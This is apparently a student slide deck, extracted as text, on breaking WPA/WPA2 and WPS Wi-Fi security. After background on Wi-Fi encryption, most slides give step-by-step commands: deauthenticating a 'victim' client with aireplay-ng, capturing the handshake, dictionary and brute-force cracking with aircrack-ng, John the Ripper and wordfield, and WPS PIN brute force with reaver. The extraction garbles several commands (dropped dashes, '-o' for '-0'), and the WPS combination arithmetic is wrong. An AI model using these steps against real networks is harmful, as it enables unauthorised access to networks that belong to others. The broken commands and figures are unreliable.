Sei sulla pagina 1di 34

WPA EXPLOITATION IN THE WORLD OF

WIRELESS NETWORK

By Hariraj Rathod
8th sem
Department of Electronics and Communication

WIFI WIRELESS FIDELITY


Wi-Fi,

is a popular technology that allows


an electronic device to exchange data or
connect to the internetwirelesslyusing
radio waves.

Wireless

access allows users to connect to


the internet from any location within
range of a wireless access point.

SOME BASIC TERMS

MAC address or physical address is aunique


identifier assigned tonetwork interfaces for
communications

Access point >> Wireless router

SSID (service set identifier) >> Network Name

BSSID (basic service set identification) >>


MAC address of the access point

BASIC WORKING
When a user uses wireless internet they generate
what are called data packets.
Packets are transmitted between the wireless
card and the wireless access point via radio
waves whenever the computer is connected with
the access point.

BASIC WORKING CONTD.

Depending on how long the computer is


connected, it can generate a certain number of
packets per day.
The more users that are connected to one access
point, the more packets are generated.

WIRELESS USES RADIO


FREQUENCY

2.4 Ghz wifi spectrum

WIRELESS ENCRYPTION
The

main source of vulnerability


associated with wireless networks are the
methods of encryption. Different type of
wireless encryption are as follows:

WEP
WPA
WPA2

WEP

Stands for Wired Equivalent Privacy.


WEP is recognizable by the key of 10 or
26hexadecimaldigits.
WEP protocol was not developed by researchers
or experts in security and cryptography.
Initial bytes of the key stream depended on just a
few bits of the encryption key.

WEP CONTINUED

WEP Encryption Process

ICV:-32 bit integrity check value (ICV)


IV:- Initialization Vector

WEP CONTINUED

WEP Decryption Process

With multiple wireless clients sending a large amount of data, an attacker


can remotely capture large amounts of WEP ciphertext and use
cryptanalysis methods to determine the WEP key.

WPA OR WPA2

Stands for Wi-Fi Protected Access

Created to provide stronger security

Still able to be cracked if a short password is used.

If a long passphrase or password is used, these protocol are


virtually not crackable.
WPA-PSK and TKIP(Temporal Key Integrity Protocol ) or AES(Advance
Encryption Standard) use a Pre-Shared Key (PSK) that is more than7
and less than 64 characters in length.
WPS (WiFi protected Feature) simple plug and play feature.

USING BACKTRACK >>


Some

Basic Backtrack Terms >>

Wlan1

wireless interface
Mon0 monitor mode
Handshake

refers to the negotiation process between the


computer and a WiFi server using WPA encryption.
Needed to crack WPA/WPA2.

Dictionary

- consisting the list of common

passwords.
.cap file used to store packets.

MONITOR MODE

Monitor mode, or RFMON (Radio Frequency


MONitor) mode, allows a computer with
awireless network interface controller (WNIC) to
monitor all traffic received from the wireless
network.
Monitor mode allows packets to be captured
without having to associate with anaccess point
first.

TOOLS USED

Airmon-ng >> Placing different cards in monitor


mode
Airodump-ng (Packet sniffer ) >> Tool used to listen to
wireless routers in the area.
Aireplay-ng ( Packet injector ) >> Aireplay-ng is used
to inject frames.

The primary function is to generate traffic for the later use


inaircrack-ng for cracking the WEP and WPA-PSK keys.

Aircrack-ng >> CracksWEPandWPA(Dictionary


attack) keys.

TOOLS USED.CONTINUED

Word Field (Brute Force)

Reaver Tool. (Brute Force)

AIRCRACK-NG

Selecting the Interface to put it in monitor mode.


Command used airmon-ng start wlan1

AIRCRACK-NG CONTINUED

Start Capturing Packets.


Airodump-ng mon0

Airodump-ng mon0 channel 1 bssid mac


id w reddot

AIRCRACK-NG CONTINUED

Deauthenticate the device connected to access


point and force them to re exchange WPA key.
Aireplay-ng -o 4 -a F4:EC:38:BA:6C:44 c
90:4C:E5:B2:6F:D8 mon0 where "-0 4" tells
aireplay to inject deauthentication packets (4 of
them), "-a" is the wireless access point MAC
address and "-c" is the client (victim) MAC
address.

AIRCRACK-NG CONTINUED

Authentication process in WPA

AIRCRACK-NG CONTINUED

4-way handshake os captured.

AIRCRACK-NG CONTINUED

Cracking the WPA key using aircrack-ng,


dictionary file and 4-way handshake captured file
redot.cap aircrack-ng -w
/home/pranav/download/password.lstb
F4:EC:38:BA:6C:44 /home/pranav/reddot01.cap where "-w" specifies the dictionary file to
use.

JOHN THE RIPPER


Faster then the previously used tool.
/pentest/password/john-1.7.6.jumbo12/run/john
-stdout -incremantal all aircrack-ng b
00:17:9A:82:44:1B -w -/home/pranav/test-01.cap

WORD FIELD
Word Field is a brute force attack.
Command line used wordfield [OPTION...]
MINLENGTH [MAXLENGTH]
Wordfield -a -n 8 8" will output all possible
alphanumeric strings which are 8 characters
long.
wordfield -a -n 8 8 | aircrack-ng b
00:17:9A:82:44:1B -w - /home/pranav/Wifire02.cap
This attack is really effective on weak keys.

WORD FIELD CONTINUED

The below took 22 hrs 7 minutes and 35 seconds

DICTIONARY AND BRUTE FORCE


LIMITATIONS
Passphrase cant be necessarily be found in
Dictionary list hence it has its limitations.
Brute force technics require lot of fast hardware
computational power.

Source: http://lastbit.com/pswcalc.asp

REAVER TOOL.
Reaver is fantastic tool to crack WPS pin
written by Craig Heffner.
This tool exploits the wps 8 digit pin.
1 bit is a checksum bit.
7 unknown numbers, meaning there are a
possible 10^7 (10,000,000) combinations which
will take approximately 116 days to break at 1
attempt every second.

REAVER TOOL CONTINUED

WPS pin 65020920

REAVER TOOL CONTINUED


Finding WPS victim
wash I mon0

REAVER TOOL CONTINUED


CRACKING TECHNIQUE
WPS pin 6502-0920
10^4 (10,000) combinations.
But since 1st bit is checksum bit hence the
combinations reduce to 10^3(1000)
This reduces the time required to break the PIN
to just over 3 hours - Again, assuming that 1
attempt is made every second.

REAVER TOOL CONTINUED

reaver -i mon0 b F4:EC:38:BA:6C:44

REAVER TOOL CONTINUED

BESECURED

REFERENCES
Wi-Fi security WEP, WPA and WPA2 Guillaume
Lehembre
http://en.wikipedia.org/wiki/WiFi_Protected_Access#WPS_PIN_recovery
https://sites.google.com/site/clickdeathsquad/Home/
cds-wpacrack
http://samiux.blogspot.in/2010/04/howtocrackwpawpa2-psk-with-john.html
http://www.zer0trusion.com/2011/09/crackingwpawithout-dictionary.html
Tactical Network Solutions
WiFi Security Megaprimer by Vivek Ramchandran

THANKS : )